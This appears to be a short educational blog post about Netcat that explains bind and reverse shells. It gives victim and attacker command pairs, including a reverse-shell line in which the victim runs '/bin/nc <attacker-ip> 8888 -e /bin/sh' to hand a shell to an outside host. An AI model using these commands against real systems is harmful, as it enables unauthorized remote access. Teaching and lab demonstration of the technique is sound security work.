Hi, I decided to write a bit about NetCat, specifically simple bind/reverse shell.
Netcat or nc is a real swiss army knife among network tools. With Netcat you can connect to many services like Telnet, RSH, HTTP etc... To that NetCat can do TCP/UDP. Netcat is very powerful, it is just because it is so powerful also used by hackers to create a backdoor or for bind and reverse shells.
A small overview of what NetCat can do
user@ubuntu~$ nc -h
[v1.10-41+b1]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-C Send CRLF as line-ending
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
Uff quite a lot what you can do with it. I won't explain all the features but just concentrate on building bind/reverse shells.
Let's pretend that we have successfully infected our victim with malware or exploited a security hole.
For demo purposes this takes place in a VM.
Port numbers always go from 0-65535
What is a bind shell?
A bind shell is nothing else than a shell that runs on the victim system and also listens to a port number for incoming connections. This means that the shell runs as a kind of server similar to SSH, Telnet etc...
As you can see, in a bind shell, the victim is the server and the attacker is the client. But how do you build a bind shell?
#Victim
/bin/nc -lvp -e /bin/sh
#Attacker
/bin/nc <victim-ip> <port>
In a VM with Kali-Linux 2 terminals are now running. One terminal now plays the victim and the other the attacker.
A connection between victim and attacker is established and after the connection the shell is started. The result can be seen in the following two screenshots.
Bind shell gets incoming connection from "attacker"
Attacker has connected to the bind shell and can work on the system e.g. list everything from the root directory
How does a reverse shell work?
A reverse shell does the connection setup the other way around. Here, instead of the victim listening for incoming connections from the attacker, the attacker listens for incoming connections from the victims. The shell continues to execute at the victim's end.
A schematic representation of the reverse shell looks like this.
Here you can see how the whole process works. The attacker creates a Netcat listener on the system and waits for an incoming connection from the victim. The victim, on the other hand, establishes a connection to the attacker and starts the shell as mentioned.
How do you build a reverse shell with it?
#Victim
/bin/nc <attacker-ip> 8888 -e /bin/sh
#Attacker
nc -lvp 8888
If you replay it now in the Kali-Linux VM it looks like this
Victim establishes a connection and starts a shell
Attacker receives the connection and has access to the victim's system here with ls
But what does this look like in reality?
In reality, both shells are not built so simply but are used in exploits, general malware that is injected onto the victim system after an exploitation.
This post is intended to provide a little insight into the topic of Netcat bind/reverse shells.
Have fun! 😃